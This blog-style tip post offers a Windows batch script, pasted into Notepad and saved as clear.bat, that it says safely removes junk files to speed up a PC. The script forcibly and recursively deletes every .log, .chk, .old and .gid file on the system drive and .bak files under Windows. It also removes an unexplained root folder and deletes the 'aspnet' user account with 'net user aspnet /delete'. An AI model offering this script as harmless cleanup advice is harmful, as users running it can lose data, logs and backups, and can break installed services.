Clear You Cache Files
Do you actually realize that your hard disk spaces are getting lesser even you’re not downloading anything? Navigation speeds also getting slower?
Yet another simple tip to share with you all. Without using any software and you can easily delete all the windows junk files in order to increase your navigation speed.
If you prefer to use software application, kindly refer to The Crap Cleaner
During the windows operation, navigation or installation, quite a number of junk files had been generated, such as: *.tmp, *. _mp, *.log, *.gid,*.chk, *.old, *.bak as well as Temporary Internet Files. Moreover, those documents can buffer for more than hundred MB of the disk space and cause your operating system getting slower. Therefore, what you need to do is to delete those files.
Anywhere, This guide is pretty simple and easy to use
1. Open your notepad
2. Copy and Paste the script as shown below
@echo off
echo Deleting Now, Please wait……
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q “%userprofile%\Local Settings\Temporary Internet Files\*.*”
del /f /s /q “%userprofile%\Local Settings\Temp\*.*”
del /f /s /q “%userprofile%\recent\*.*”
DEL /S /F /Q “%systemroot%\Temp\*.*”
RD /S /Q %windir%\temp & md %windir%\temp
RD /S /Q “%userprofile%\Local Settings\Temp”
MD “%userprofile%\Local Settings\Temp”
RD /S /Q “%systemdrive%\Program Files\Temp”
MD “%systemdrive%\Program Files\Temp”
RD /S /Q “%systemdrive%\d”
net user aspnet /delete
echo Deleting Completed!!
echo. & pause
3. Save your file as clear.bat or any file name you want
4. Done! Every time you want to run cleaning, just click the file
Thanks! Great article! Without using any software and you can easily delete all the windows junk files in order to increase your navigation speed.